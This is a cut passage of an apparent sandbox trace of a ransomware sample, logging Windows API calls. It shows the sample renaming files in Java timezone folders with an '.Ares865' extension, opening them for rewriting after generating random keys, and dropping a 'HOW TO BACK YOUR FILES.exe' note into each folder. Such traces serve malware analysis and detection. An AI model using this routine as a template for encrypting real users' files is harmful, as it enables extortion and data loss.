szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.402] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.403] lstrcpyW (in: lpString1=0x2cce462, lpString2="Faroe" | out: lpString1="Faroe") returned="Faroe" [0134.403] lstrlenW (lpString="Faroe") returned 5 [0134.403] lstrlenW (lpString="Ares865") returned 7 [0134.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.Ares865") returned 62 [0134.403] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe.ares865"), dwFlags=0x1) returned 1 [0134.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1016) returned 1 [0134.405] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.408] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.409] lstrcpyW (in: lpString1=0x2cce462, lpString2="Madeira" | out: lpString1="Madeira") returned="Madeira" [0134.409] lstrlenW (lpString="Madeira") returned 7 [0134.409] lstrlenW (lpString="Ares865") returned 7 [0134.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.Ares865") returned 64 [0134.410] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira.ares865"), dwFlags=0x1) returned 1 [0134.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1864) returned 1 [0134.412] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.415] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.416] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.416] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.416] lstrcpyW (in: lpString1=0x2cce462, lpString2="Reykjavik" | out: lpString1="Reykjavik") returned="Reykjavik" [0134.416] lstrlenW (lpString="Reykjavik") returned 9 [0134.416] lstrlenW (lpString="Ares865") returned 7 [0134.416] lstrcmpiW (lpString1="ykjavik", lpString2="Ares865") returned 1 [0134.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.Ares865") returned 66 [0134.417] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik.ares865"), dwFlags=0x1) returned 1 [0134.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=577) returned 1 [0134.419] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.419] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.419] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.423] lstrcpyW (in: lpString1=0x2cce462, lpString2="South_Georgia" | out: lpString1="South_Georgia") returned="South_Georgia" [0134.423] lstrlenW (lpString="South_Georgia") returned 13 [0134.423] lstrlenW (lpString="Ares865") returned 7 [0134.423] lstrcmpiW (lpString1="Georgia", lpString2="Ares865") returned 1 [0134.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.Ares865") returned 70 [0134.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia.ares865"), dwFlags=0x1) returned 1 [0134.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.426] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.430] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.431] lstrcpyW (in: lpString1=0x2cce462, lpString2="Stanley" | out: lpString1="Stanley") returned="Stanley" [0134.431] lstrlenW (lpString="Stanley") returned 7 [0134.431] lstrlenW (lpString="Ares865") returned 7 [0134.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.Ares865") returned 64 [0134.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley.ares865"), dwFlags=0x1) returned 1 [0134.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.433] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=621) returned 1 [0134.434] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.434] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.434] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.437] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.438] lstrcpyW (in: lpString1=0x2cce462, lpString2="St_Helena" | out: lpString1="St_Helena") returned="St_Helena" [0134.438] lstrlenW (lpString="St_Helena") returned 9 [0134.438] lstrlenW (lpString="Ares865") returned 7 [0134.438] lstrcmpiW (lpString1="_Helena", lpString2="Ares865") returned -1 [0134.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.Ares865") returned 66 [0134.438] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena.ares865"), dwFlags=0x1) returned 1 [0134.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.440] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.444] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.445] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia" [0134.445] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia" [0134.445] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0134.446] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0134.446] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.447] GetLastError () returned 0x0 [0134.447] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0134.447] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745c78c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b862c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b862c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0134.447] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0134.447] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0134.447] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Aden" | out: lpString1="Aden") returned="Aden" [0134.447] lstrlenW (lpString="Aden") returned 4 [0134.448] lstrlenW (lpString="Ares865") returned 7 [0134.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.Ares865") returned 57 [0134.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden.ares865"), dwFlags=0x1) returned 1 [0134.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.449] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.450] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.450] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.453] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.453] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.453] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.454] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Almaty" | out: lpString1="Almaty") returned="Almaty" [0134.454] lstrlenW (lpString="Almaty") returned 6 [0134.454] lstrlenW (lpString="Ares865") returned 7 [0134.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.Ares865") returned 59 [0134.454] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty.ares865"), dwFlags=0x1) returned 1 [0134.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.456] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=453) returned 1 [0134.456] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.460] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.460] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.461] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Amman" | out: lpString1="Amman") returned="Amman" [0134.461] lstrlenW (lpString="Amman") returned 5 [0134.461] lstrlenW (lpString="Ares865") returned 7 [0134.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.Ares865") returned 58 [0134.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman.ares865"), dwFlags=0x1) returned 1 [0134.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1036) returned 1 [0134.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.466] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.467] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.467] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.468] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Anadyr" | out: lpString1="Anadyr") returned="Anadyr" [0134.468] lstrlenW (lpString="Anadyr") returned 6 [0134.468] lstrlenW (lpString="Ares865") returned 7 [0134.468] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.Ares865") returned 59 [0134.468] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr.ares865"), dwFlags=0x1) returned 1 [0134.470] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.470] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=585) returned 1 [0134.470] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.471] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.471] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.473] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.474] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Aqtau" | out: lpString1="Aqtau") returned="Aqtau" [0134.474] lstrlenW (lpString="Aqtau") returned 5 [0134.474] lstrlenW (lpString="Ares865") returned 7 [0134.475] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.Ares865") returned 58 [0134.475] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau.ares865"), dwFlags=0x1) returned 1 [0134.477] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.477] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=453) returned 1 [0134.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.478] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.478] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.480] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.482] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Aqtobe" | out: lpString1="Aqtobe") returned="Aqtobe" [0134.482] lstrlenW (lpString="Aqtobe") returned 6 [0134.482] lstrlenW (lpString="Ares865") returned 7 [0134.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.Ares865") returned 59 [0134.482] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe.ares865"), dwFlags=0x1) returned 1 [0134.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.484] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=453) returned 1 [0134.484] CryptAcquireContextW (in: 